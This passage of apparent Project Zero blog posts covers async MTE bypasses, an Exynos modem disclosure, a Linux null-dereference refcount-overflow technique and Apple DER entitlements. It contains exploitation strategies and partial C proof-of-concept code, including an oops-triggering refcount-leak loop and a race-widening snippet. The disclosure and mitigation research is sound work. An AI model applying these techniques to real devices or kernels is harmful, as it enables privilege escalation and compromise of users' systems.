It seems hard to imagine designing a signal handler that will be robust against all possible attacks here, as most data that is accessed by the signal handler will now need to be treated as untrusted. It's our understanding that Android is considering making changes to the way that the kernel handles these failures to guarantee delivery of these errors to an out-of-process handler, preventing this kind of bypass.

4. Generic bypass in multi-threaded environments [ASYNC].

Since async MTE failures are only delivered when the thread which caused the error enters the kernel, there's a slightly more involved (but more generic) bypass available in multi-threaded environments. If we can coerce another thread into performing our next exploit steps for us, then we can bypass the protection this way.

The example we've provided in async_bypass_thread.c and async_bypass_thread.js demonstrates an exploit using this technique against a simulated bug in the duktape javascript interpreter.

taro:/data/local/tmp $ ./async_bypass_thread ./async_bypass_thread.js                                                                                      

thread is running

Async MTE bypassed!

Note that in practice, the technique here would most likely be to have the coerced thread simply install a new signal handler, effectively reimplementing the bypass from section 3 above, but the example invokes a shell command as a demonstration.
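To make the mechanics concrete, here is a minimal sketch of the hand-off (a toy single-slot work queue of our own, not the provided example): the compromised thread avoids the kernel entirely and lets a clean helper thread make the syscalls.

#include <pthread.h>
#include <stdatomic.h>
#include <stdio.h>

// Toy single-slot "work queue": a function pointer polled by the helper.
static _Atomic(void (*)(void)) g_work = NULL;
static atomic_int g_done = 0;

static void next_exploit_step(void) {
  // Runs on the helper thread, which has no pending tag-check failure and
  // can therefore enter the kernel freely (e.g. to install a permissive
  // signal handler as in section 3, or to run a command).
  printf("helper thread running attacker-controlled step\n");
  atomic_store(&g_done, 1);
}

static void* helper(void* arg) {
  (void)arg;
  for (;;) {
    void (*work)(void) = atomic_exchange(&g_work, NULL);
    if (work != NULL) {
      work();
      return NULL;
    }
  }
}

int main(void) {
  pthread_t t;
  pthread_create(&t, NULL, helper, NULL);
  // Pretend main is the compromised thread with an outstanding async MTE
  // failure: from here on it only performs plain loads and stores.
  atomic_store(&g_work, next_exploit_step);
  while (!atomic_load(&g_done)) {
    // spin without entering the kernel
  }
  // In the real attack, the helper would by now have disabled the
  // protection, making it safe for this thread to enter the kernel again.
  pthread_join(t, NULL);
  return 0;
}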

How wide are these windows?

So, we've identified two methods by which a compromised thread might avoid the consequences of performing invalid accesses. This was a known and expected limitation of async-MTE-as-a-security-mitigation — but how significant is this?

In the existing (linux) kernel implementation, an outstanding async-MTE failure is delivered as a SIGSEGV when the thread that performed the faulting access transitions to kernel mode. This means that the user-to-kernel transition can be thought of as a synchronisation barrier for tag-check failures.
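As a small illustration of this barrier, consider the following sketch, which reuses the mte_enable/mte_tag helpers from the samples above (the assumption that false selects async mode is ours, not stated by the samples):

// Sketch: in async mode a tag-check failure is recorded at the access but
// only reported at the next kernel entry.
int main(void) {
  mte_enable(false, DEFAULT_TAG_MASK);  // async mode (assumed helper semantics)
  char* ptr = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE|PROT_MTE,
                   MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);
  mte_tag(ptr, 0x10);                  // retag the memory; ptr's tag is now
                                       // stale (modulo a chance tag collision)
  *ptr = 'A';                          // failure recorded here, but no signal yet
  for (volatile int i = 0; i < 100000000; i++) {}  // userspace work continues
  write(STDOUT_FILENO, "!", 1);        // first syscall: the SIGSEGV arrives here
  return 0;
}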

This leads us to our first rule for async-MTE-safe exploitation:

  1. We need to complete our exploit (or disable async-MTE) without needing to make a system call from the faulting thread.

This will already pose a significant limitation in some contexts - for example, many network services will have a `read/write` loop in between commands, so this would mean that the exploit must be completed within the execution of a single command. However, for many other contexts, this is less of an issue - a vulnerability in a complex file format parser, decompression algorithm or scripting engine will likely provide sufficient control between system calls to complete an exploit (as demonstrated above with the duktape javascript engine).

There is then a second requirement that the exploit-writer needs to bear in mind, which is the periodic timer interrupt. In the kernel configuration tested, this was set to `CONFIG_HZ_250`, so we can expect a timer interrupt every 4ms, leading us to our second rule[3]:

  2. We need to complete our exploit in ~0.2ms if we want to get acceptable (95%[4]) reliability: with a 4ms tick, an exploit that runs for t ms is interrupted with probability of roughly t/4, so every additional 0.01ms of exploit runtime costs roughly 0.25% of reliability.

Part 2 continues with a higher-level analysis of the effectiveness of various different MTE configurations in a variety of user-space application contexts, and what type of impact we'd expect to see on attacker cost.

[1] It is known/expected that Spectre-type attacks are possible to leak pointer values from memory.

[2] ARM indicated that this should not be the case (this potential weakness was raised with them early in the MTE design process).

[3] This assumes that the attacker can't construct a side-channel allowing them to determine when a timer interrupt has happened in the target process, which seems like a reasonable assumption in a remote media-parsing scenario, but less so in the context of a local privilege elevation.

[4] 95% is a rough estimate - part 2 discusses the reasoning here in more detail; but note that we would consider this a rough reference point for what attackers will likely work towards, and not a hard limit.

Summary: MTE As Implemented

2 August 2023 at 16:30

By Mark Brand, Project Zero

In mid-2022, Project Zero was provided with access to pre-production hardware implementing the ARM MTE specification. This blog post series is based on that review, and includes general conclusions about the effectiveness of MTE as implemented, specifically in the context of preventing the exploitation of memory-safety vulnerabilities.

Despite its limitations, MTE is still by far the most promising path forward for improving C/C++ software security in 2023. The ability of MTE to detect memory corruption exploitation at the first dangerous access provides a significant improvement in diagnostic and potential security effectiveness. In comparison, most other proposed approaches rely on blocking later stages in the exploitation process, for example various hardware-assisted CFI approaches which aim to block invalid control-flow transfers.

No MTE-based mitigation is going to completely solve the problem of exploitable C/C++ memory safety issues. The unfortunate reality of speculative side-channel attacks is that MTE will not end memory corruption exploitation. However, there are no other practical proposals with a similarly broad impact on the exploitability (and exploitation cost) of such a wide range of memory corruption issues that would additionally address this limitation.

Furthermore, given the long history of innovation and research in this space, we believe that it is not possible to build a software solution for C/C++ memory safety with comparable coverage to MTE that has less runtime overhead than AddressSanitizer/HWAsan. It's clear that such an overhead is not acceptable for most production workloads.

Products that expect to contain large C/C++ codebases in the long term, and that consider the exploitation of memory corruption vulnerabilities to be a key risk for their product security, should actively drive support for ARM's MTE in their products.

For a more detailed analysis, see the following linked blog posts:

  1. Implementation Testing - An objective summary of the tests performed, and some basic analysis. If you're interested in implementing a mitigation based on MTE, you should read this document first as it will give you more detailed technical background.

  2. Mitigation Case Studies - A subjective assessment of the impact of various mitigation approaches based on the use of MTE in various user-mode contexts, based on our experiences during the tests performed in Part 1. If you're not interested in implementing a mitigation based on MTE, but you are interested in the limits of how effective such a mitigation might be, you can skip Part 1 and start here.

  3. The Kernel - A subjective assessment of the additional issues faced in using MTE for a kernel-mode mitigation.

Release of a Technical Report into Intel Trust Domain Extensions

24 April 2023 at 16:27

Today, members of Google Project Zero and Google Cloud are releasing a report on a security review of Intel's Trust Domain Extensions (TDX). TDX is a feature introduced to support Confidential Computing by providing hardware isolation of virtual machine guests at runtime. This isolation is achieved by securing sensitive resources, such as guest physical memory. This restricts what information is exposed to the hosting environment.

The security review was performed in cooperation with Intel engineers on pre-release source code for version 1.0 of the TDX feature. This code is the basis for the TDX implementation which will be shipping in limited SKUs of the 4th Generation Intel Xeon Scalable CPUs.

The result of the review was the discovery of 10 confirmed security vulnerabilities, which were fixed before the final release of products with the TDX feature. The final report highlights the most interesting of these issues and provides an overview of the feature's architecture. Five additional areas were identified for defense-in-depth changes to subsequent versions of TDX.

You can read more details about the review on the Google Cloud security blog and the final report. If you would like to review the source code yourself, Intel has made it available on the TDX website.

Multiple Internet to Baseband Remote Code Execution Vulnerabilities in Exynos Modems

16 March 2023 at 18:07

Posted by Tim Willis, Project Zero

In late 2022 and early 2023, Project Zero reported eighteen 0-day vulnerabilities in Exynos Modems produced by Samsung Semiconductor. The four most severe of these eighteen vulnerabilities (CVE-2023-24033, CVE-2023-26496, CVE-2023-26497 and CVE-2023-26498) allowed for Internet-to-baseband remote code execution. Tests conducted by Project Zero confirm that those four vulnerabilities allow an attacker to remotely compromise a phone at the baseband level with no user interaction, and require only that the attacker know the victim's phone number. With limited additional research and development, we believe that skilled attackers would be able to quickly create an operational exploit to compromise affected devices silently and remotely.

The fourteen other related vulnerabilities (CVE-2023-26072, CVE-2023-26073, CVE-2023-26074, CVE-2023-26075, CVE-2023-26076 and nine other vulnerabilities that are yet to be assigned CVE-IDs) were not as severe, as they require either a malicious mobile network operator or an attacker with local access to the device.

Affected devices

Samsung Semiconductor's advisories provide the list of Exynos chipsets that are affected by these vulnerabilities. Based on information from public websites that map chipsets to devices, affected products likely include:

  • Mobile devices from Samsung, including those in the S22, M33, M13, M12, A71, A53, A33, A21s, A13, A12 and A04 series;
  • Mobile devices from Vivo, including those in the S16, S15, S6, X70, X60 and X30 series;
  • The Pixel 6 and Pixel 7 series of devices from Google; and
  • any vehicles that use the Exynos Auto T5123 chipset.

Patch timelines

We expect that patch timelines will vary per manufacturer (for example, affected Pixel devices have received a fix for all four of the severe Internet-to-baseband remote code execution vulnerabilities in the March 2023 security update). In the meantime, users with affected devices can protect themselves from the baseband remote code execution vulnerabilities mentioned in this post by turning off Wi-Fi calling and Voice-over-LTE (VoLTE) in their device settings, although your ability to change this setting can be dependent on your carrier. As always, we encourage end users to update their devices as soon as possible, to ensure that they are running the latest builds that fix both disclosed and undisclosed security vulnerabilities.

Four vulnerabilities being withheld from disclosure

Under our standard disclosure policy, Project Zero discloses security vulnerabilities to the public a set time after reporting them to a software or hardware vendor. In some rare cases where we have assessed attackers would benefit significantly more than defenders if a vulnerability was disclosed, we have made an exception to our policy and delayed disclosure of that vulnerability.

Due to a very rare combination of level of access these vulnerabilities provide and the speed with which we believe a reliable operational exploit could be crafted, we have decided to make a policy exception to delay disclosure for the four vulnerabilities that allow for Internet-to-baseband remote code execution. We will continue our history of transparency by publicly sharing disclosure policy exceptions, and will add these issues to that list once they are all disclosed.

Related vulnerabilities not being withheld

Of the remaining fourteen vulnerabilities, we are disclosing four vulnerabilities (CVE-2023-26072, CVE-2023-26073, CVE-2023-26074 and CVE-2023-26075) that have exceeded Project Zero's standard 90-day deadline today. These issues have been publicly disclosed in our issue tracker, as they do not meet the high standard to be withheld from disclosure. The remaining ten vulnerabilities in this set have not yet hit their 90-day deadline, but will be publicly disclosed at that point if they are still unfixed.

Changelog

2023-03-21: Removed note at the top of the blog as patches are more widely available for the four severe vulnerabilities. Added additional context that some carriers can control the Wi-Fi calling and VoLTE settings, overriding the ability for some users to change this setting.

2023-03-20: Google Pixel updated their March 2023 Security Bulletin to now show that all four Internet-to-baseband remote code execution vulnerabilities were fixed for Pixel 6 and Pixel 7 in the March 2023 update, not just one of the vulnerabilities, as originally stated.

2023-03-20: Samsung Semiconductor updated their advisories to include three new CVE-IDs, that correspond to the three other Internet-to-baseband remote code execution issues (CVE-2023-26496, CVE-2023-26497 and CVE-2023-26498). The blogpost text was updated to reflect these new CVE-IDs.

2023-03-17: Samsung Semiconductor updated their advisories to remove Exynos W920 as an affected chipset, so we have removed it from the "Affected devices" section.

2023-03-17: Samsung Mobile advised us that the A21s is the correct affected device, not the A21 as originally stated.

2023-03-17: Four of the fourteen less severe vulnerabilities hit their 90-day deadline at the time of publication, not five, as originally stated.

Exploiting null-dereferences in the Linux kernel

19 January 2023 at 17:33

Posted by Seth Jenkins, Project Zero

For a fair amount of time, null-deref bugs were a highly exploitable kernel bug class. Back when the kernel was able to access userland memory without restriction, and userland programs were still able to map the zero page, there were many easy techniques for exploiting null-deref bugs. However with the introduction of modern exploit mitigations such as SMEP and SMAP, as well as mmap_min_addr preventing unprivileged programs from mmap’ing low addresses, null-deref bugs are generally not considered a security issue in modern kernel versions. This blog post provides an exploit technique demonstrating that treating these bugs as universally innocuous often leads to faulty evaluations of their relevance to security.

Kernel oops overview

At present, when the Linux kernel triggers a null-deref from within a process context, it generates an oops, which is distinct from a kernel panic. A panic occurs when the kernel determines that there is no safe way to continue execution, and that therefore all execution must cease. However, the kernel does not stop all execution during an oops - instead the kernel tries to recover as best as it can and continue execution. In the case of a task, that involves throwing out the existing kernel stack and going directly to make_task_dead which calls do_exit. The kernel will also publish in dmesg a “crash” log and kernel backtrace depicting what state the kernel was in when the oops occurred. This may seem like an odd choice to make when memory corruption has clearly occurred - however the intention is to allow kernel bugs to more easily be detectable and loggable under the philosophy that a working system is much easier to debug than a dead one.

The unfortunate side effect of the oops recovery path is that the kernel is not able to perform any associated cleanup that it would normally perform on a typical syscall error recovery path. This means that any locks that were locked at the moment of the oops stay locked, any refcounts remain taken, any memory otherwise temporarily allocated remains allocated, etc. However, the process that generated the oops, its associated kernel stack, task struct and derivative members etc. can and often will be freed, meaning that depending on the precise circumstances of the oops, it’s possible that no memory is actually leaked. This becomes particularly important in regards to exploitation later.

Reference count mismanagement overview

Refcount mismanagement is a fairly well-known and exploitable issue. In the case where software improperly decrements a refcount, this can lead to a classic UAF primitive. The case where software improperly doesn't decrement a refcount (leaking a reference) is also often exploitable. If the attacker can cause a refcount to be repeatedly improperly incremented, it is possible that given enough effort the refcount may overflow, at which point the software no longer has any remotely sensible idea of how many refcounts are taken on an object. In such a case, it is possible for an attacker to destroy the object by incrementing and decrementing the refcount back to zero after overflowing, while still holding reachable references to the associated memory. 32-bit refcounts are particularly vulnerable to this sort of overflow. It is important, however, that each increment of the refcount allocates little or no physical memory. Even a single-byte allocation is quite expensive if it must be performed 2^32 times.
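As a loose illustration of the arithmetic (a userspace sketch in plain C, not kernel code; the counter stands in for an overflow-unsafe 32-bit refcount):

#include <stdint.h>
#include <stdio.h>

int main(void) {
  uint32_t refcount = 1;                     // one legitimate reference
  for (uint64_t i = 0; i < (1ULL << 32); i++)
    refcount++;                              // 2^32 leaked increments wrap around
  printf("refcount after 2^32 leaks: %u\n", refcount);  // still 1
  refcount--;                                // one ordinary "put"...
  printf("refcount now: %u\n", refcount);    // 0: the object would be freed,
                                             // with ~2^32 references still live
  return 0;
}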

Example null-deref bug

When a kernel oops unceremoniously ends a task, any refcounts that the task was holding remain held, even though all memory associated with the task may be freed when the task exits. Let’s look at an example - an otherwise unrelated bug I coincidentally discovered in the very recent past:

static int show_smaps_rollup(struct seq_file *m, void *v)

{

        struct proc_maps_private *priv = m->private;

        struct mem_size_stats mss;

        struct mm_struct *mm;

        struct vm_area_struct *vma;

        unsigned long last_vma_end = 0;

        int ret = 0;

        priv->task = get_proc_task(priv->inode); //task reference taken

        if (!priv->task)

                return -ESRCH;

        mm = priv->mm; //With no vma's, mm->mmap is NULL

        if (!mm || !mmget_not_zero(mm)) { //mm reference taken

                ret = -ESRCH;

                goto out_put_task;

        }

        memset(&mss, 0, sizeof(mss));

        ret = mmap_read_lock_killable(mm); //mmap read lock taken

        if (ret)

                goto out_put_mm;

        hold_task_mempolicy(priv);

        for (vma = priv->mm->mmap; vma; vma = vma->vm_next) {

                smap_gather_stats(vma, &mss);

                last_vma_end = vma->vm_end;

        }

        show_vma_header_prefix(m, priv->mm->mmap->vm_start,last_vma_end, 0, 0, 0, 0); //the deref of mmap causes a kernel oops here

        seq_pad(m, ' ');

        seq_puts(m, "[rollup]\n");

        __show_smap(m, &mss, true);

        release_task_mempolicy(priv);

        mmap_read_unlock(mm);

out_put_mm:

        mmput(mm);

out_put_task:

        put_task_struct(priv->task);

        priv->task = NULL;

        return ret;

}

This file is intended simply to print a set of memory usage statistics for the respective process. Regardless, this bug report reveals a classic and otherwise innocuous null-deref bug within this function. In the case of a task that has no VMA’s mapped at all, the task’s mm_struct mmap member will be equal to NULL. Thus the priv->mm->mmap->vm_start access causes a null dereference and consequently a kernel oops. This bug can be triggered by simply read’ing /proc/[pid]/smaps_rollup on a task with no VMA’s (which itself can be stably created via ptrace):

Kernel log showing the oops condition backtrace

This kernel oops will mean that the following events occur:

  1. The associated struct file will have a refcount leaked if fdget took a refcount (we’ll try and make sure this doesn’t happen later)
  2. The associated seq_file within the struct file has a mutex that will forever be locked (any future reads/writes/lseeks etc. will hang forever).
  3. The task struct associated with the smaps_rollup file will have a refcount leaked
  4. The mm_struct’s mm_users refcount associated with the task will be leaked
  5. The mm_struct’s mmap lock will be permanently readlocked (any future write-lock attempts will hang forever)

Each of these conditions is an unintentional side-effect that leads to buggy behaviors, but not all of those behaviors are useful to an attacker. The permanent locking of conditions 2 and 5 only makes exploitation more difficult. Condition 1 is unexploitable because we cannot leak the struct file refcount again without taking a mutex that will never be unlocked. Condition 3 is unexploitable because a task struct uses a safe saturating kernel refcount_t which prevents the overflow condition. This leaves condition 4.


The mm_users refcount still uses an overflow-unsafe atomic_t, and since we can take a readlock an indefinite number of times, the associated mmap_read_lock does not prevent us from incrementing the refcount again. There are a couple of important roadblocks we need to avoid in order to repeatedly leak this refcount:

  1. We cannot call this syscall from the task with the empty vma list itself - in other words, we can’t call read from /proc/self/smaps_rollup. Such a process cannot easily make repeated syscalls since it has no virtual memory mapped. We avoid this by reading smaps_rollup from another process.
  2. We must re-open the smaps_rollup file every time because any future reads we perform on a smaps_rollup instance we already triggered the oops on will deadlock on the local seq_file mutex lock which is locked forever. We also need to destroy the resulting struct file (via close) after we generate the oops in order to prevent untenable memory usage.
  3. If we access the mm through the same pid every time, we will run into the task struct max refcount before we overflow the mm_users refcount. Thus we need to create two separate tasks that share the same mm and balance the oopses we generate across both tasks so the task refcounts grow half as quickly as the mm_users refcount. We do this via the clone flag CLONE_VM.
  4. We must avoid opening/reading the smaps_rollup file from a task that has a shared file descriptor table, as otherwise a refcount will be leaked on the struct file itself. This isn’t difficult, just don’t read the file from a multi-threaded process.

Our final refcount leaking overflow strategy is as follows:

  1. Process A forks a process B
  2. Process B issues PTRACE_TRACEME so that when it segfaults upon return from munmap it won’t go away (but rather will enter tracing stop)
  3. Process B clones another process C with CLONE_VM | CLONE_PTRACE
  4. Process B munmap’s its entire virtual memory address space - this also unmaps process C’s virtual memory address space.
  5. Process A forks new children D and E which will access (B|C)’s smaps_rollup file respectively
  6. (D|E) opens (B|C)’s smaps_rollup file and performs a read which will oops, causing (D|E) to die. mm_users will be refcount leaked/incremented once per oops
  7. Process A goes back to step 5 ~2^32 times

The above strategy can be rearchitected to run in parallel (across processes, not threads, because of roadblock 4) and improve performance. On server setups that print kernel logging to a serial console, generating 2^32 kernel oopses takes over 2 years. However on a vanilla Kali Linux box using a graphical interface, a demonstrative proof-of-concept takes only about 8 days to complete! At the completion of execution, the mm_users refcount will have overflowed and be set to zero, even though this mm is currently in use by multiple processes and can still be referenced via the proc filesystem.
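For illustration, steps 5 through 7 might look something like the following sketch (sequential, not the parallel version; the two command-line arguments are assumed to be the pids of tasks B and C from the strategy above):

#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/wait.h>
#include <unistd.h>

// One leak: fork a throwaway reader which oopses (and dies) inside read(),
// incrementing the target mm's mm_users refcount without a matching decrement.
static void leak_one_ref(pid_t target) {
  pid_t child = fork();
  if (child == 0) {
    char path[64];
    snprintf(path, sizeof(path), "/proc/%d/smaps_rollup", (int)target);
    int fd = open(path, O_RDONLY);  // fresh struct file every time (roadblock 2)
    char buf[16];
    read(fd, buf, sizeof(buf));     // kernel oops: the child never gets past this
    _exit(0);                       // not reached
  }
  waitpid(child, NULL, 0);          // reap the oopsed child
}

int main(int argc, char** argv) {
  if (argc < 3) return 1;
  pid_t targets[2] = { atoi(argv[1]), atoi(argv[2]) };  // tasks B and C
  for (uint64_t i = 0; i < (1ULL << 32); i++)
    leak_one_ref(targets[i % 2]);   // balance oopses across B and C (roadblock 3)
  return 0;
}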

Exploitation

Once the mm_users refcount has been set to zero, triggering undefined behavior and memory corruption should be fairly easy. By triggering an mmget and an mmput (which we can very easily do by opening the smaps_rollup file once more) we should be able to free the entire mm and cause a UAF condition:

static inline void __mmput(struct mm_struct *mm)

{

        VM_BUG_ON(atomic_read(&mm->mm_users));

        uprobe_clear_state(mm);

        exit_aio(mm);

        ksm_exit(mm);

        khugepaged_exit(mm);

        exit_mmap(mm);

        mm_put_huge_zero_page(mm);

        set_mm_exe_file(mm, NULL);

        if (!list_empty(&mm->mmlist)) {

                spin_lock(&mmlist_lock);

                list_del(&mm->mmlist);

                spin_unlock(&mmlist_lock);

        }

        if (mm->binfmt)

                module_put(mm->binfmt->module);

        lru_gen_del_mm(mm);

        mmdrop(mm);

}

Unfortunately, since 64591e8605 (“mm: protect free_pgtables with mmap_lock write lock in exit_mmap”), exit_mmap unconditionally takes the mmap lock in write mode. Since this mm’s mmap_lock is permanently readlocked many times, any calls to __mmput will manifest as a permanent deadlock inside of exit_mmap.

However, before the call permanently deadlocks, it will call several other functions:

  1. uprobe_clear_state
  2. exit_aio
  3. ksm_exit
  4. khugepaged_exit

Additionally, we can call __mmput on this mm from several tasks simultaneously by having each of them trigger an mmget/mmput on the mm, generating irregular race conditions. Under normal execution, it should not be possible to trigger multiple __mmput’s on the same mm (much less concurrent ones) as __mmput should only be called on the last and only refcount decrement which sets the refcount to zero. However, after the refcount overflow, all mmget/mmput’s on the still-referenced mm will trigger an __mmput. This is because each mmput that decrements the refcount to zero (despite the corresponding mmget being why the refcount was above zero in the first place) believes that it is solely responsible for freeing the associated mm.

Flowchart showing how mmget/mmput on a 0 refcount leads to unsafe concurrent __mmput calls.

This racy __mmput primitive extends to its callees as well. exit_aio is a good candidate for taking advantage of this:

void exit_aio(struct mm_struct *mm)

{

        struct kioctx_table *table = rcu_dereference_raw(mm->ioctx_table);

        struct ctx_rq_wait wait;

        int i, skipped;

        if (!table)

                return;

        atomic_set(&wait.count, table->nr);

        init_completion(&wait.comp);

        skipped = 0;

        for (i = 0; i < table->nr; ++i) {

                struct kioctx *ctx =

                rcu_dereference_protected(table->table[i], true);

                if (!ctx) {

                        skipped++;

                        continue;

                }

                ctx->mmap_size = 0;

                kill_ioctx(mm, ctx, &wait);

        }

        if (!atomic_sub_and_test(skipped, &wait.count)) {

                /* Wait until all IO for the context are done. */

                wait_for_completion(&wait.comp);

        }

        RCU_INIT_POINTER(mm->ioctx_table, NULL);

        kfree(table);

}

While the callee function kill_ioctx is written in such a way as to prevent concurrent execution from causing memory corruption (part of the contract of aio allows for kill_ioctx to be called in a concurrent way), exit_aio itself makes no such guarantees. Two concurrent calls of exit_aio on the same mm struct can consequently induce a double free of the mm->ioctx_table object, which is fetched at the beginning of the function, while only being freed at the very end. This race window can be widened substantially by creating many aio contexts in order to slow down exit_aio's internal context freeing loop. Successful exploitation will trigger the following kernel BUG indicating that a double free has occurred:

Kernel backtrace showing the double free condition detection

Note that as this exit_aio path is hit from __mmput, triggering this race will produce at least two permanently deadlocked processes when those processes later try to take the mmap write lock. However, from an exploitation perspective, this is irrelevant as the memory corruption primitive has already occurred before the deadlock occurs. Exploiting the resultant primitive would probably involve racing a reclaiming allocation in between the two frees of the mm->ioctx_table object, then taking advantage of the resulting UAF condition of the reclaimed allocation. It is undoubtedly possible, although I didn’t take this all the way to a completed PoC.
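For illustration, widening the race window as described might look something like the following sketch using the raw io_setup syscall (the context count is illustrative, and bounded in practice by the fs.aio-max-nr sysctl):

#include <linux/aio_abi.h>
#include <stdio.h>
#include <sys/syscall.h>
#include <unistd.h>

// Each successful io_setup() adds an entry to mm->ioctx_table. A long table
// slows down exit_aio's context-freeing loop, widening the window between
// the fetch of mm->ioctx_table and its free.
int main(void) {
  for (int i = 0; i < 10000; i++) {
    aio_context_t ctx = 0;
    if (syscall(SYS_io_setup, 1, &ctx) < 0) {
      perror("io_setup");  // probably hit fs.aio-max-nr
      break;
    }
  }
  /* ...then trigger the racing mmget/mmput pairs on the target mm... */
  return 0;
}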

Conclusion

While the null-dereference bug itself was fixed in October 2022, the more important fix was the introduction of an oops limit which causes the kernel to panic if too many oopses occur. While this patch is already upstream, it is important that distributed kernels also inherit this oops limit and backport it to LTS releases if we want to avoid treating such null-dereference bugs as full-fledged security issues in the future. Even in that best-case scenario, it is nevertheless highly beneficial for security researchers to carefully evaluate the side-effects of bugs discovered in the future that are similarly “harmless” and ensure that the abrupt halt of kernel code execution caused by a kernel oops does not lead to other security-relevant primitives.

DER Entitlements: The (Brief) Return of the Psychic Paper

12 January 2023 at 16:59

Posted by Ivan Fratric, Project Zero

Note: The vulnerability discussed here, CVE-2022-42855, was fixed in iOS 15.7.2 and macOS Monterey 12.6.2. While the vulnerability did not appear to be exploitable on iOS 16 and macOS Ventura, iOS 16.2 and macOS Ventura 13.1 nevertheless shipped hardening changes related to it.

Last year, I spent a lot of time researching the security of applications built on top of XMPP, an instant messaging protocol based on XML. More specifically, my research focused on how subtle quirks in XML parsing can be used to undermine the security of such applications. (If you are interested in learning more about that research, I did a talk on it at Black Hat USA 2022. The slides and the recording can be found here and here).

At some point, when a part of my research was published, people pointed out other examples (unrelated to XMPP) where quirks in XML parsing led to security vulnerabilities. One of those examples was a vulnerability dubbed Psychic Paper, a really neat vulnerability in the way Apple operating system checks what entitlements an application has.

Entitlements are one of the core security concepts of Apple’s operating systems. As Apple’s documentation explains, “An entitlement is a right or privilege that grants an executable particular capabilities.” For example, an application on an Apple operating system can’t debug another application without possessing proper entitlements, even if those two applications run as the same user. Even applications running as root can’t perform all actions (such as accessing some of the kernel APIs) without appropriate entitlements.

Psychic Paper was a vulnerability in the way entitlements were checked. Entitlements were stored inside the application’s signature blob in the XML format, so naturally the operating system needed to parse those at some point using an XML parser. The problem was that the OS didn’t have a single parser for this, but rather a staggering four parsers that were used in different places in the operating system. One parser was used for the initial check that the application only has permitted entitlements, and a different parser was later used when checking whether the application has an entitlement to perform a specific action.

When giving my talk on XMPP, I gave a challenge to the audience: Find me two different XML parsers that always, for every input, result in the same output. The reason that is difficult is that XML, although intended to be a simple format, is in reality anything but simple. So it shouldn't come as a surprise that a way was found for one of Apple's XML parsers to return one set of entitlements and another parser to see a different set of entitlements when parsing the same entitlements blob.

As for the fix for the Psychic Paper bug: the problem occurred because Apple had four XML parsers in the OS, so, somewhat surprisingly, the fix was to add a fifth one.

So, after my XMPP research, when I learned about the Psychic Paper bug, I decided to take a look at these XML parsers and see if I could somehow find another way to trigger the bug even after the fix. After playing with various Apple XML parsers, I had an XML snippet I wanted to try out. However, when I actually tried to use it in an application, I discovered that the system for checking entitlements behaved completely differently than I thought. This was because of…

DER Entitlements

According to Apple developer documentation, “Starting in iOS 15, iPadOS 15, tvOS 15, and watchOS 8, the system checks for a new, more secure signature format that uses Distinguished Encoding Rules, or DER, to embed entitlements into your app’s signature”. As another Apple article boldly proclaims, “The future is DER”.

So, what is DER?

Unlike the previous text-based XML format, DER is a binary format, also commonly used in digital certificates. The format is specified in the X.690 standard.

DER follows relatively simple type-length-data encoding rules. An image from the specification illustrates that:

The Identifier field encodes the object type, which can be a primitive (e.g. a string or a boolean), but also a constructed type (an object containing other objects, e.g. an array/sequence). The length can be encoded differently depending on the length of the content (e.g. if the content is smaller than 128 bytes, the length field only takes a single byte). The length field is followed by the content itself. In the case of constructed types, the content is also encoded using the same encoding rules.
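To make the encoding concrete, here is a minimal sketch of decoding a single DER header (a hypothetical helper of ours; it handles only single-octet identifiers and the short/long definite-length forms, with minimal validation):

#include <stddef.h>
#include <stdint.h>

// Decode the identifier and length of one DER element in [p, end).
// Returns a pointer to the content, or NULL on malformed input.
static const uint8_t* der_header(const uint8_t* p, const uint8_t* end,
                                 uint8_t* tag, size_t* len) {
  if (end - p < 2) return NULL;
  *tag = *p++;                   // identifier octet (the type)
  uint8_t first = *p++;
  if (first < 0x80) {            // short form: length fits in 7 bits
    *len = first;
  } else {                       // long form: (first & 0x7f) length bytes follow
    size_t nbytes = first & 0x7f;
    if (nbytes == 0 || nbytes > sizeof(size_t) ||
        (size_t)(end - p) < nbytes) return NULL;
    size_t value = 0;
    while (nbytes--) value = (value << 8) | *p++;
    *len = value;
  }
  return ((size_t)(end - p) >= *len) ? p : NULL;  // content must fit
}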

An example from Apple developer documentation shows what DER-encoded entitlements might look like:

appl [ 16 ]       

 INTEGER           :01

 cont [ 16 ]       

  SEQUENCE          

   UTF8STRING        :application-identifier

   UTF8STRING        :SKMME9E2Y8.com.example.apple-samplecode.ProfileExplainer

  SEQUENCE          

   UTF8STRING        :com.apple.developer.team-identifier

   UTF8STRING        :SKMME9E2Y8

  SEQUENCE          

   UTF8STRING        :get-task-allow

   BOOLEAN           :255

  SEQUENCE          

   UTF8STRING        :keychain-access-groups

   SEQUENCE          

    UTF8STRING        :SKMME9E2Y8.*

    UTF8STRING        :com.apple.token

Each individual entitlement is a sequence which has two elements: a key and a value, e.g. “get-task-allow”:boolean(true). All entitlements are also a part of a constructed type (denoted as “cont [ 16 ]” in the listing).

DER is meant to have unique binary representation and replacing XML with DER was very likely motivated, at least in part, by preventing issues such as Psychic Paper. But does it necessarily succeed in that goal?

How entitlements are checked

To understand how entitlements are checked, it is useful to also look at the bigger picture and understand what security/integrity checks Apple operating systems perform on binaries before (and in some cases, while) running them.

Integrity information in Apple binaries is stored in a structure called the Embedded Signature Blob. This structure is a container for various other structures that play a role in integrity checking: the digital signature itself, but also entitlements and an important structure called the Code Directory. The Code Directory contains a hash of every page in the binary (up to the Signature Blob), but also other information, including the hash of the entitlements blob. The hash of the Code Directory is called the cdHash and it is used to uniquely identify the binary. For example, it is the cdHash that the digital signature actually signs. Note that since the Code Directory contains a hash of the entitlements blob, any change to the entitlements will lead to a different cdHash.

As also noted in the Psychic Paper writeup, there are several ways a binary might be signed:

  • The cdHash of the binary could be in the system’s Trust Cache, which stores the hashes of system binaries.
  • The binary could be signed by the Apple App Store.
  • The binary could be signed by the developer, but in that case it must reference a “Provisioning Profile” signed by Apple.
  • On macOS only, a binary could also be self-signed.

We are mostly interested in the last two cases, because they are the only ones that allow us to provide custom entitlements. However, in those cases, any entitlements a binary has must either be a subset of those allowed by the provisioning profile created by Apple (in the “provisioning profile” case) or entitlements must only contain those whitelisted by the OS (in the self-signed case). That is, unless one has a vulnerability like Psychic Paper.

An entrypoint into file integrity checks is the vnode_check_signature function inside the AppleMobileFileIntegrity kernel extension. AppleMobileFileIntegrity is the kernel component of integrity checking, but there is also the userspace daemon amfid, which AppleMobileFileIntegrity uses to perform certain actions as noted further in the text.

